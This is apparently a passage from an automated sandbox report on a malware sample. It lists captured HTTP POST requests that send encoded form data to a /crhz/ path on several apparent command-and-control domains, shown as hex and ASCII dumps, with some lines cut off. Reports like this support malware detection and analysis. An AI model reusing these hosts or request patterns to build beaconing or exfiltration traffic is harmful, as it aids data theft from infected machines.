4f 49 77 34 64 42 30 64 50 76 41 32 30 6c 44 55 62 4f 32 45 77 67 56 66 6a 61 71 33 4a 68 45 44 57 36 55 76 2d 6c 33 65 50 71 6e 4b 73 38 6e 47 66 55 78 78 74 4e 46 4b 70 38 34 77 69 73 36 6d 74 4b 63 49 46 58 31 58 46 4d 46 28 6c 78 47 28 54 57 6a 38 35 6b 30 53 51 56 4d 68 4e 42 66 58 37 77 57 45 68 6f 64 48 67 68 4c 6b 42 33 52 7a 65 55 5f 56 36 36 43 55 73 54 61 69 2d 33 5f 59 48 6c 73 59 72 4d 55 57 31 54 71 70 6e 33 46 6d 70 6c 50 30 4d 53 68 30 73 55 4d 68 51 72 70 71 75 61 6e 55 30 74 44 62 59 7e 65 4a 79 54 46 6c 6e 33 75 31 33 4b 4f 52 79 65 7a 4a 42 73 44 4c 63 70 38 47 67 61 70 68 5f 5a 30 4f 71 61 67 38 46 6d 6e 58 57 54 4c 48 4f 39 32 44 36 61 47 49 65 56 70 75 67 7e 78 78 36 46 69 4f 7a 68 44 70 5a 73 56 33 4f 52 31 7a 58 64 65 7e 4f 67 72 34 69 58 61 71 63 28 4c 56 59 37 76 71 5f 53 35 50 44 6e 36 79 5f 51 52 32 63 34 73 59 55 4a 48 28 6a 4c 53 79 31 78 5a 6f 34 36 77 6b 43 6f 37 38 34 4b 63 7a 75 6c 65 6
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.tf8dangky.onlineConnection: closeContent-Length: 191Cache-Control: no-cacheOrigin: http://www.tf8dangky.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tf8dangky.online/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 67 68 4a 35 54 3d 31 5a 4e 6d 7e 71 37 64 47 32 57 50 6f 57 74 51 5a 43 63 2d 67 70 42 7a 34 58 53 39 47 48 76 4f 65 65 62 4e 55 58 57 38 4d 49 31 50 6f 53 63 46 61 74 75 6e 6d 44 45 70 38 34 7a 6f 69 34 7e 6e 58 44 35 78 71 4e 69 51 72 71 56 51 30 49 4d 79 71 59 59 5f 48 74 28 36 39 39 52 64 33 58 68 30 70 6b 61 67 71 4e 7e 74 6e 38 78 5f 35 6f 68 7a 48 76 6b 58 71 6c 71 35 36 76 71 35 6e 33 31 71 74 75 78 70 4d 43 63 43 56 75 34 75 73 71 56 75 61 6d 46 36 28 45 4a 37 38 77 55 67 65 6e 74 35 6d 6b 46 5a 30 45 39 63 4e 6e 31 4a 36 48 59 41 4e 6d 53 71 62 56 45 2e 00 00 00 00 00 00 00 00 Data Ascii: ghJ5T=1ZNm~q7dG2WPoWtQZCc-gpBz4XS9GHvOeebNUXW8MI1PoScFatunmDEp84zoi4~nXD5xqNiQrqVQ0IMyqYY_Ht(699Rd3Xh0pkagqN~tn8x_5ohzHvkXqlq56vq5n31qtuxpMCcCVu4usqVuamF6(EJ78wUgent5mkFZ0E9cNn1J6HYANmSqbVE.
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.tf8dangky.onlineConnection: closeContent-Length: 1455Cache-Control: no-cacheOrigin: http://www.tf8dangky.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.tf8dangky.online/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 67 68 4a 35 54 3d 31 5a 4e 6d 7e 71 37 64 47 32 57 50 79 33 64 51 62 68 6b 2d 6f 70 42 38 30 33 53 39 4e 6e 76 4b 65 65 58 4e 55 57 53 73 50 36 35 50 6f 42 6b 46 55 75 47 6e 6b 44 45 70 7e 34 7a 6b 6d 34 7e 4c 58 44 39 31 71 4d 53 36 72 6f 35 51 32 72 30 79 6f 61 41 38 4e 39 7e 63 71 74 52 65 33 58 68 6c 70 6b 4b 73 71 4e 4b 58 6e 38 70 5f 35 61 4a 7a 57 76 6b 55 6c 46 71 35 36 76 71 39 6e 33 30 7a 74 75 70 50 4d 47 59 53 53 59 55 75 70 36 31 75 63 42 78 39 32 6b 4a 5f 69 41 56 66 4f 79 77 76 38 47 45 64 37 6b 52 37 59 58 30 37 31 32 56 75 4b 48 65 72 5a 44 36 74 63 30 55 4b 56 51 4b 67 78 68 37 38 69 6f 39 36 53 31 52 48 42 56 61 68 70 6d 30 79 36 4b 31 31 4a 65 55 78 37 59 76 48 34 61 74 4b 5a 62 6d 62 62 64 66 4c 6e 6e 64 63 50 6b 35 58 37 32 63 63 43 4b 76 47 28 37 71 62 4f 50 44 70 38 52 51 36 55 53 49 31 59 47 53 2d 7a 46 56 30 43 56 6d 66 67 73 54 59 31 61 71 5f 44 4b 6b 6c 42 6a 54 75 6c 4e 55 51 33 51 34 63 38 76 63 51 41 33 47 71 73 66 46 43 7a 49 47 31 37 56 4f 68 48 4e 73 4f 4b 72 4e 79 76 6c 7e 4b 35 64 4c 63 33 57 66 70 66 6d 35 5a 52 48 28 75 46 72 39 77 38 48 51 69 36 58 4d 41 58 2d 4f 77 49 4a 6d 33 5a 79 67 53 43 6a 49 64 47 63 37 5f 63 52 57 36 78 4c 70 47 47 49 52 4e 61 35 69 51 76 41 73 58 57 65 56 5a 4a 76 71 71 34 75 6c 30 59 34 64 31 74 41 4d 31 30 39 45 33 64 72 68 30 68 53 45 49 51 64 4c 31 36 62 70 36 68 5f 64 61 6c 43 7e 76 47 70 28 6d 6b 6e 37 7a 7e 5a 38 33 4c 47 6e 49 66 55 4b 65 6a 37 46 6e 77 75 5a 4a 44 77 64 47 49 4e 6d 47 72 62 31 6c 57 47 77 49 7e 77 5a 2d 6f 6e 76 54 32 5a 68 53 76 63 48 2d 7a 4c 77 4d 57 6d 62 42 4d 55 36 5a 6b 36 49 36 6e 56 5a 73 36 46 73 4a 76 70 38 6e 64 5f 57 62 37 79 53 73 4c 65 30 74 72 76 39 42 6b 62 32 4f 41 53 5a 57 41 4c 28 49 4d 6f 51 37 66 32 4d 63 69 71 63 37 59 72 7a 71 38 67 78 65 34 46 4a 66 36 76 47 54 41 42 7a 61 57 43 58 44 45 42 6f 36 77 4a 34 58 6e 33 37 6c 56 35 37 49 56 47 67 55 75 37 4a 50 30 51 48 6f 54 6f 32 53 6d 61 35 53 4b 46 74 55 67 38 6e 73 7e 64 62 38 36 2d 70 7a 39 78 7e 51 34 71 58 77 49 78 31 61 67 37 47 4c 68 37 4b 57 47 42 4a 76 4f 31 32 54 39 72 78 77 39 69 41 6e 4d 41 46 35 4f 30 6a 36 71 71 6b 4a 33 6c 4d 2d 44 68 61 71 61 68 41 4e 38 77 72 4f 36 31 77 55 6a 64 37 4f 4b 58 69 70 56 74 35 57 6f 44 43 53 6a 50 51 68 28 79 6e 73 57 4b 67 61 43 67 73 54 78 6f 41 42 53 49 4b 79 4c 72 7a 73 4e 42 66 61 73 65 31 61 57 4c 62 72 6b 34 57 49 62 2d 50 77 67 43 76 71 37 4e 36 48 56 56 41 55 78 51 65 61 5a 49 51 6a 6b 56 68 5f 28 6e 45 32 4b 53 51 75 77 50 38 65 61 53 33 30 37 4f 6c 67 74 75 30 63 67 6f 50 74 30 66 35 44 4d 63 44 74 41 7a 6b 4b 69 58 49 66 6
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.teammart.onlineConnection: closeContent-Length: 191Cache-Control: no-cacheOrigin: http://www.teammart.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.teammart.online/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 67 68 4a 35 54 3d 31 62 53 71 44 46 52 35 4f 76 63 4e 36 33 74 4b 71 42 6e 31 47 51 57 68 49 5f 64 69 55 54 6a 6e 78 2d 77 38 69 4b 78 78 78 6b 33 36 45 41 6c 41 7a 76 36 57 50 4f 43 48 61 57 59 6d 55 62 69 5a 54 4b 51 74 7e 53 31 4f 71 68 4a 72 7a 77 49 38 54 63 31 33 4a 50 44 75 59 33 44 30 6c 68 66 37 48 34 5a 75 71 7a 76 54 69 64 4a 35 78 41 48 51 75 71 52 6b 35 54 68 31 6a 65 31 67 4a 67 49 78 42 49 32 70 4a 70 62 71 47 57 6a 76 65 69 76 4e 35 49 6c 75 45 2d 5a 76 59 50 73 63 75 71 6e 34 4b 61 67 70 79 6a 57 47 64 54 32 7a 49 74 39 54 6e 41 70 63 6c 70 4d 2e 00 00 00 00 00 00 00 00 Data Ascii: ghJ5T=1bSqDFR5OvcN63tKqBn1GQWhI_diUTjnx-w8iKxxxk36EAlAzv6WPOCHaWYmUbiZTKQt~S1OqhJrzwI8Tc13JPDuY3D0lhf7H4ZuqzvTidJ5xAHQuqRk5Th1je1gJgIxBI2pJpbqGWjveivN5IluE-ZvYPscuqn4KagpyjWGdT2zIt9TnApclpM.
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.teammart.onlineConnection: closeContent-Length: 1455Cache-Control: no-cacheOrigin: http://www.teammart.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.teammart.online/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 67 68 4a 35 54 3d 31 62 53 71 44 46 52 35 4f 76 63 4e 37 58 64 4b 6f 67 6e 31 44 77 57 69 48 66 64 69 65 7a 6a 6a 78 2d 38 38 69 4c 31 66 78 58 62 36 46 58 68 41 69 4b 6d 57 4e 4f 43 48 63 57 5a 75 62 37 69 54 54 4b 55 70 7e 53 46 65 71 69 6c 72 79 57 59 38 56 61 70 32 52 50 44 57 63 33 44 7a 6c 68 65 35 48 34 70 79 71 79 62 35 69 64 52 35 78 56 7a 51 6e 36 52 6a 32 7a 68 31 6a 65 31 53 4a 67 4a 53 42 49 28 76 4a 6f 43 6e 47 67 6e 76 65 47 7a 4e 7e 71 4e 74 4d 65 5a 6a 47 66 73 4b 75 35 61 74 47 62 67 6c 28 58 79 31 64 42 6d 39 50 5f 30 73 7e 56 42 41 6d 73 34 4e 30 30 43 42 71 38 36 70 43 6b 34 4a 5a 77 6c 46 78 4b 38 6a 37 6b 38 7a 58 78 6d 55 72 35 7e 70 41 6a 35 50 6f 6d 6e 31 56 4c 79 32 5a 54 4e 59 63 33 73 33 35 6b 64 4d 58 31 47 57 57 50 62 34 45 62 42 46 79 58 68 52 66 59 48 67 62 70 6a 43 58 32 35 5f 53 42 43 39 70 50 77 4e 46 4f 53 6c 45 48 42 49 64 6d 72 4b 62 41 74 47 46 56 72 45 58 6d 74 47 51 6a 58 49 63 6c 50 57 43 76 6b 49 79 46 69 61 69 61 34 64 68 55 43 72 70 54 4b 56 5a 6e 75 78 43 76 5a 6d 34 70 79 58 62 7a 48 2d 53 65 55 59 71 6c 38 57 28 72 70 6d 4c 5f 6a 71 65 78 5a 74 41 50 67 66 75 52 63 30 79 55 49 58 66 78 31 6e 34 6f 4a 30 37 4e 6e 5a 6d 74 76 34 6e 4e 6b 6a 31 6b 75 34 70 68 4e 4e 43 66 33 69 73 69 30 55 4a 6d 77 5f 37 4c 6c 50 65 70 46 53 47 61 32 78 51 76 4c 6e 6e 67 58 55 31 41 77 68 5a 54 55 65 56 69 71 38 49 68 57 55 4b 74 37 30 4b 6b 4b 32 4a 66 61 46 38 42 79 56 38 78 77 5a 59 49 45 78 32 46 48 44 68 5a 68 45 47 57 4a 39 61 7a 69 63 67 34 70 41 67 6c 45 57 45 38 50 6f 6e 44 6c 65 74 33 7e 32 58 76 71 4f 78 37 69 6c 52 73 74 30 37 6a 6d 6b 4d 68 76 7a 79 4b 39 32 73 45 67 37 56 54 36 54 38 2d 5a 2d 65 47 6e 56 39 51 75 4c 73 6e 51 34 4c 6c 69 62 30 51 62 31 75 53 38 63 30 33 76 59 67 52 7a 70 56 73 47 73 72 39 6d 59 76 76 6b 36 52 30 78 31 67 33 6b 41 71 6b 49 66 31 6c 65 6e 4b 4a 65 48 31 52 77 32 6b 45 71 77 69 6d 65 5f 5a 52 35 68 44 44 56 33 72 38 77 63 71 71 51 66 6f 69 37 72 66 42 65 4c 31 71 76 70 42 51 7e 74 61 72 79 75 31 6b 5a 59 4d 52 4f 67 39 4d 36 52 49 45 78 4f 66 36 6d 57 76 70 69 74 31 74 30 48 56 38 77 39 45 4c 71 6a 44 6c 6f 56 32 4e 35 42 64 44 5a 39 5a 43 4b 68 6d 32 50 6e 7a 77 4e 54 4e 2d 34 4b 4c 43 73 2d 52 56 6e 6d 63 51 49 39 4b 56 32 44 36 44 35 35 4c 6b 6f 4a 6b 76 6e 43 77 68 73 79 65 32 30 43 36 48 50 63 62 55 6f 38 46 61 28 41 41 5f 4b 6f 55 52 33 37 56 75 4f 5a 4d 34 6a 66 65 70 6b 70 66 46 58 50 70 42 4e 74 46 4e 31 38 50 77 54 72 30 50 72 62 30 5f 79 46 75 77 5a 43 30 74 57 34 71 74 49 4a 4f 46 67 46 56 73 6c 79 56 4a 56 45 52 41 33 59 4f 37 59 53 52 6f 75 6b 56 57 43 6e 28 3
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.suachuadienlanh247.comConnection: closeContent-Length: 191Cache-Control: no-cacheOrigin: http://www.suachuadienlanh247.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.suachuadienlanh247.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 67 68 4a 35 54 3d 50 41 71 6b 64 53 34 39 69 76 63 39 4c 48 41 4b 35 73 76 63 4b 48 45 61 6e 47 71 45 39 71 49 43 6a 78 6b 72 46 52 67 2d 45 69 65 57 6b 61 6f 50 4a 54 6a 77 75 34 55 62 44 63 4b 5f 64 33 78 71 56 5f 53 39 6e 46 71 69 4a 35 67 76 32 45 41 38 44 78 55 36 5a 69 33 53 42 42 75 69 70 33 53 61 59 46 35 73 6d 68 6e 56 46 33 32 6a 77 73 41 57 4b 58 4d 44 32 4b 57 45 4b 64 61 59 58 5f 6f 37 6d 53 34 2d 4a 6a 74 34 6a 72 5a 55 55 57 61 57 66 2d 67 47 6f 68 28 70 77 67 6e 7a 34 4e 6d 4b 4d 6e 4a 67 53 36 4c 36 31 55 38 42 37 75 59 74 74 73 36 71 43 39 45 2e 00 00 00 00 00 00 00 00 Data Ascii: ghJ5T=PAqkdS49ivc9LHAK5svcKHEanGqE9qICjxkrFRg-EieWkaoPJTjwu4UbDcK_d3xqV_S9nFqiJ5gv2EA8DxU6Zi3SBBuip3SaYF5smhnVF32jwsAWKXMD2KWEKdaYX_o7mS4-Jjt4jrZUUWaWf-gGoh(pwgnz4NmKMnJgS6L61U8B7uYtts6qC9E.
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.suachuadienlanh247.comConnection: closeContent-Length: 1455Cache-Control: no-cacheOrigin: http://www.suachuadienlanh247.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.suachuadienlanh247.com/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 67 68 4a 35 54 3d 50 41 71 6b 64 53 34 39 69 76 63 39 4c 6d 77 4b 28 4c 54 63 44 48 45 56 73 6d 71 45 6d 36 49 65 6a 78 67 72 46 51 6b 75 45 77 79 57 6a 4a 51 50 49 78 4c 77 69 59 55 62 57 4d 4b 37 51 58 78 38 56 5f 76 47 6e 45 61 59 4a 36 4d 76 77 6e 34 38 46 30 49 37 53 79 33 51 46 42 75 6c 70 33 53 31 59 42 64 7a 6d 67 53 49 46 7a 61 6a 77 61 63 57 4e 6e 4d 41 7a 4b 57 45 4b 64 61 55 58 5f 6f 54 6d 57 55 6d 4a 6a 46 6f 6a 38 68 55 55 79 4f 57 64 64 59 46 68 42 7e 42 34 41 6d 33 31 73 50 64 47 57 73 5a 5a 4b 43 59 70 46 4d 57 77 4f 6b 6b 35 2d 37 68 62 34 75 5f 70 53 42 68 50 6d 75 73 50 44 71 5f 4a 4f 67 41 79 70 37 35 41 4f 59 7a 77 79 76 45 35 37 64 36 37 71 61 46 74 6d 6e 4d 67 58 32 49 62 43 54 2d 28 34 4e 76 39 53 47 56 41 67 68 35 35 53 6c 34 71 45 4e 6d 33 48 34 4c 77 49 5a 41 7e 63 4b 74 64 39 56 4f 31 6a 44 5a 79 33 7e 68 31 64 72 71 76 56 72 7a 34 41 59 2d 30 42 48 36 57 43 7e 5f 53 43 6b 39 6e 38 78 61 70 57 6b 58 33 79 62 6d 34 52 74 5f 5a 75 72 63 6a 4c 30 32 45 5a 43 67 70 6f 36 38 6a 6d 33 73 59 62 6f 35 69 6d 75 5f 48 78 67 4f 33 6b 67 4c 59 63 44 63 33 4c 30 59 54 6e 4a 57 38 38 46 31 38 4b 38 64 78 2d 4a 76 77 37 44 4c 4b 71 46 7a 37 56 58 62 58 66 7a 59 78 55 6b 47 57 55 46 71 46 68 6f 55 53 63 5a 46 64 64 54 72 36 46 77 37 65 31 37 5a 78 67 61 4a 72 48 4d 4c 77 32 30 69 4e 66 65 71 7a 50 65 54 4a 62 49 6e 31 69 70 46 56 6c 64 6e 7e 59 44 74 64 4c 6a 4c 32 30 6a 33 5a 4b 6b 6f 44 30 37 59 43 54 46 6a 4c 5a 54 70 61 33 78 43 32 69 56 59 54 5f 58 4c 41 39 55 59 7e 45 73 75 68 63 52 43 31 6f 76 57 6a 48 41 6a 31 62 55 75 49 33 54 77 69 31 76 65 48 50 45 7a 38 59 55 70 63 52 76 6b 57 6b 33 50 79 30 69 55 79 64 34 59 4a 39 50 6f 6c 54 77 32 41 4b 42 4a 28 6d 53 73 70 53 55 45 4d 64 45 30 30 69 47 37 59 67 4d 6f 32 65 4f 6b 63 6d 70 75 6d 4d 6e 32 38 6d 6d 51 68 2d 72 61 6f 34 6d 47 77 32 74 44 30 77 28 57 30 64 58 37 46 6e 5a 6e 37 7a 7a 61 77 69 48 36 47 74 79 36 4c 6f 58 70 35 6f 64 72 73 6f 45 52 62 75 53 4e 31 52 7e 4e 73 4a 71 45 50 66 34 54 37 6c 75 66 47 72 58 62 56 70 35 6c 63 4a 66 6e 4d 58 71 45 30 38 35 6c 35 76 28 68 42 6a 44 35 54 35 41 36 42 62 78 59 66 78 58 4b 64 5f 58 50 43 51 59 7a 4d 51 7a 76 4a 48 4c 76 53 41 6e 55 33 78 35 4b 4a 6a 4f 63 63 68 51 7a 57 72 46 4a 6c 55 4e 74 46 6e 31 52 41 37 48 4a 56 33 76 71 43 37 62 63 33 33 50 79 56 47 71 51 75 67 59 73 38 51 59 66 4d 77 7a 74 6f 66 77 77 43 6c 6f 63 69 34 6e 76 4e 56 34 33 51 78 72 71 70 50 53 71 38 77 68 75 34 37 31 72 59 67 58 5a 72 7a 74 37 64 52 44 63 4c 79 6b 76 5a 74 66 6d 72 47 65 7a 33 73 67 52 65 78 6a 56 30 64 4c 63 5a 4b 7
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.hvlandscapes.bizConnection: closeContent-Length: 191Cache-Control: no-cacheOrigin: http://www.hvlandscapes.bizUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hvlandscapes.biz/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 67 68 4a 35 54 3d 67 6b 6e 50 38 4e 70 51 78 33 54 51 33 63 67 4b 7a 71 7e 50 28 51 44 47 30 4c 52 70 30 39 62 47 50 53 65 47 31 50 71 6e 48 62 35 52 30 5a 48 74 75 78 48 36 55 46 36 76 51 76 64 76 63 6c 4b 5a 41 6a 4d 75 4b 76 6d 66 56 59 52 6b 47 41 49 43 37 70 33 6a 42 51 41 52 71 30 74 66 66 37 6d 65 6c 70 65 42 52 7a 7a 51 65 54 79 6c 43 6c 52 30 55 74 57 7a 6d 45 68 37 76 79 6f 42 36 6c 6e 43 65 30 53 41 79 37 76 79 6b 56 67 64 4b 5f 4a 67 78 58 43 58 44 49 6d 6e 79 75 67 48 4b 62 7e 62 28 2d 43 78 35 2d 33 35 34 63 32 44 76 39 41 4e 52 63 79 38 44 77 41 2e 00 00 00 00 00 00 00 00 Data Ascii: ghJ5T=gknP8NpQx3TQ3cgKzq~P(QDG0LRp09bGPSeG1PqnHb5R0ZHtuxH6UF6vQvdvclKZAjMuKvmfVYRkGAIC7p3jBQARq0tff7melpeBRzzQeTylClR0UtWzmEh7vyoB6lnCe0SAy7vykVgdK_JgxXCXDImnyugHKb~b(-Cx5-354c2Dv9ANRcy8DwA.
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.hvlandscapes.bizConnection: closeContent-Length: 1455Cache-Control: no-cacheOrigin: http://www.hvlandscapes.bizUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.hvlandscapes.biz/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 67 68 4a 35 54 3d 67 6b 6e 50 38 4e 70 51 78 33 54 51 33 34 63 4b 67 5a 6d 50 35 77 44 46 6f 37 52 70 69 4e 62 38 50 53 53 47 31 4f 75 33 48 74 42 52 78 65 44 74 75 54 76 36 53 46 36 76 42 5f 64 72 52 46 4b 50 41 6a 5a 66 4b 75 36 6c 56 65 4a 6b 47 6a 67 43 77 4c 76 67 50 41 41 54 37 6b 74 63 66 37 6d 78 6c 6f 75 65 52 7a 32 4e 65 54 71 6c 43 58 35 30 41 4e 57 30 28 6b 68 37 76 79 6f 64 36 6c 6e 36 65 33 69 6d 79 2d 37 63 6b 6e 49 64 4c 65 46 67 79 30 61 55 58 34 6d 72 73 2d 68 44 4c 70 6e 30 6c 63 7e 38 33 62 6d 65 6d 75 53 6f 74 64 6f 43 49 50 32 47 59 77 48 65 78 49 38 44 43 57 33 6c 28 6a 45 6e 6e 36 75 4c 41 56 38 42 38 4b 41 35 66 7a 59 4e 69 5f 4f 76 54 5f 71 5f 77 55 67 32 41 37 55 73 7a 69 61 41 58 53 48 47 57 52 65 4c 6b 48 47 6c 49 6a 41 32 6b 31 53 4a 32 66 56 52 4d 54 64 30 4d 59 71 53 4f 37 54 75 39 41 57 30 47 77 42 39 28 37 42 58 71 37 49 32 58 36 44 6b 38 35 31 4d 4a 66 49 54 70 5f 62 4c 7a 2d 4f 44 66 51 41 4c 62 6b 6c 62 70 30 4c 32 6a 70 70 4c 4d 63 71 39 6c 52 6e 6e 62 6c 6e 41 43 70 28 78 34 48 62 38 28 4c 4e 4c 72 33 4f 35 51 45 36 59 4c 7a 66 34 47 5a 52 6a 4b 4e 59 2d 73 59 31 33 6f 7a 61 44 42 6e 71 31 33 38 61 34 37 49 4d 6c 6d 56 43 6a 38 71 7e 46 33 44 75 31 43 48 33 42 4c 58 67 51 6e 46 4a 37 37 5a 34 6b 4a 62 68 6f 51 6e 4b 45 4b 4a 34 6d 77 4c 28 54 4f 49 47 70 45 6e 74 79 75 4f 57 51 74 75 5a 35 6e 65 44 48 72 6e 4e 33 34 70 72 75 5a 72 47 61 66 35 6b 34 78 75 7a 77 55 38 6b 6e 64 34 75 70 70 6c 6f 66 31 71 6c 43 65 62 59 41 67 45 37 65 66 70 28 4c 6a 45 52 73 62 4d 7e 66 55 75 6f 67 6a 30 39 73 41 68 4e 44 34 46 6c 57 47 61 46 71 54 53 7e 72 47 33 34 6c 46 75 55 4e 76 50 30 39 71 61 32 43 4c 42 6a 67 62 55 53 4e 54 61 6d 65 68 4b 73 6e 51 4d 62 34 6e 74 59 66 49 51 65 59 51 35 38 7a 4d 34 49 47 63 30 75 6f 54 53 7e 2d 4a 39 6e 6c 45 46 78 4f 79 6c 58 70 32 74 7a 78 69 6f 73 58 71 48 79 49 4a 67 77 6b 35 55 49 38 71 6c 47 4e 5a 53 53 45 46 56 59 39 6f 56 41 62 33 46 55 6a 4a 39 6d 4f 31 48 59 63 68 37 65 47 36 57 52 79 66 5a 73 2d 28 4e 4d 69 56 73 73 78 68 78 51 2d 6e 49 6c 4a 55 71 71 52 6c 7a 61 44 62 34 67 57 31 34 6c 67 64 6c 44 73 51 4f 4a 42 65 53 59 6f 35 48 4d 4a 4b 41 76 4a 71 48 69 47 77 38 64 49 38 63 6e 42 64 59 51 55 67 4e 68 7a 4a 78 4d 47 6b 47 45 4f 65 34 4d 72 43 42 61 74 79 43 57 31 39 77 56 32 78 6a 34 2d 71 77 75 56 71 74 62 79 73 31 64 6a 6e 61 4d 75 63 53 6f 75 50 45 6c 4a 77 61 41 44 77 4b 35 79 45 67 6e 6c 56 62 4f 48 4f 6d 4c 36 71 66 28 45 6a 62 6f 78 39 35 44 58 66 2d 47 4c 6f 33 6f 62 30 37 67 55 4e 4b 73 57 64 55 39 62 64 65 30 49 74 72 69 45 4b 78 42 59 4c 35 65 56 36 68 71 71 3
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.frogair.onlineConnection: closeContent-Length: 191Cache-Control: no-cacheOrigin: http://www.frogair.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.frogair.online/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 67 68 4a 35 54 3d 76 77 30 6a 4e 31 43 6a 39 4c 34 4a 46 6a 35 70 30 64 58 39 36 37 6e 67 77 41 73 7a 7e 66 64 59 6f 67 4e 47 6e 43 46 48 54 49 4f 68 44 34 42 6d 4e 72 46 56 6f 74 4c 36 37 4d 53 34 64 30 32 76 53 66 6e 43 64 4c 36 68 67 6d 34 57 55 4d 63 31 53 67 6c 76 42 47 50 5f 4f 67 49 66 28 50 6b 4a 6c 46 4c 41 46 76 6a 30 6e 36 77 44 49 54 43 59 74 44 66 6f 4f 41 59 58 35 56 65 72 6b 51 76 36 33 64 43 63 62 32 43 51 71 67 6d 47 64 7a 54 71 6a 67 47 32 35 7a 4c 41 7a 32 56 35 63 45 39 34 6e 79 38 65 49 78 58 77 4c 5f 34 4d 72 4c 57 33 54 36 51 7a 6c 4e 41 2e 00 00 00 00 00 00 00 00 Data Ascii: ghJ5T=vw0jN1Cj9L4JFj5p0dX967ngwAsz~fdYogNGnCFHTIOhD4BmNrFVotL67MS4d02vSfnCdL6hgm4WUMc1SglvBGP_OgIf(PkJlFLAFvj0n6wDITCYtDfoOAYX5VerkQv63dCcb2CQqgmGdzTqjgG25zLAz2V5cE94ny8eIxXwL_4MrLW3T6QzlNA.
          Source: global trafficHTTP traffic detected: POST /crhz/ HTTP/1.1Host: www.frogair.onlineConnection: closeContent-Length: 1455Cache-Control: no-cacheOrigin: http://www.frogair.onlineUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://www.frogair.online/crhz/Accept-Language: en-USAccept-Encoding: gzip, deflateData Raw: 67 68 4a 35 54 3d 76 77 30 6a 4e 31 43 6a 39 4c 34 4a 46 44 70 70 6e 71 4c 39 74 72 6e 76 73 51 73 7a 6c 76 63 77 6f 67 4a 47 6e 48 39 58 54 2d 7e 68 47 5f 74 6d 4a 35 39 56 6c 4e 4c 36 39 4d 53 43 44 45 33 6b 53 66 6a 34 64 4a 69 78 67 6c 55 57 58 72 59 31 55 6a 4e 67 4f 57 50 39 5a 77 49 63 28 50 6b 51 6c 46 62 4d 46 76 6e 65 6e 36 6f 44 49 68 71 59 71 7a 66 72 43 67 59 58 35 56 65 6e 6b 51 75 72 33 64 61 45 62 79 6d 41 72 57 4b 47 64 53 66 71 69 47 4f 78 28 7a 4b 4a 35 57 56 6f 61 32 6f 51 6e 44 35 74 65 45 44 31 63 4d 51 75 6d 59 6e 73 41 76 4e 70 32 71 55 43 6c 64 59 37 6b 79 4e 54 39 73 34 4e 6a 75 57 4f 63 64 6d 71 4a 42 4c 43 45 79 53 71 28 76 4c 79 73 2d 69 34 49 78 36 45 4a 74 51 6d 4e 47 77 55 4c 46 71 5a 74 44 4b 71 51 68 65 75 47 67 66 63 49 39 51 6b 30 79 6b 72 52 37 52 51 43 4d 48 46 6e 44 34 30 4e 62 73 62 6c 6f 66 50 7e 63 51 35 38 50 6f 63 35 67 66 5a 7a 49 75 59 4a 46 4a 69 47 50 4b 38 34 51 4e 6b 28 39 6b 6f 53 5f 6c 41 7e 75 57 38 70 61 6a 31 75 48 67 41 54 30 39 50 49 4f 6a 55 71 62 6d 30 55 55 38 67 49 5a 45 5a 46 49 7a 78 4a 54 4d 37 44 41 77 52 54 45 5a 6c 56 4a 79 51 4d 6a 41 30 75 32 49 44 4e 66 31 63 51 73 79 52 47 6b 4d 6c 56 38 61 4e 73 5a 41 38 51 78 33 32 7e 30 28 42 47 4b 34 7a 49 30 41 48 53 71 7e 33 4c 68 7a 6c 52 57 64 55 39 71 58 50 55 7a 50 65 66 4e 50 53 38 6a 71 66 69 54 39 30 72 47 38 43 64 6f 52 59 6c 36 6f 61 63 37 53 54 52 69 57 51 6e 49 56 32 6d 5a 64 6e 66 4e 76 41 54 38 35 71 66 79 68 66 63 52 7a 75 46 6e 4f 31 4a 46 6d 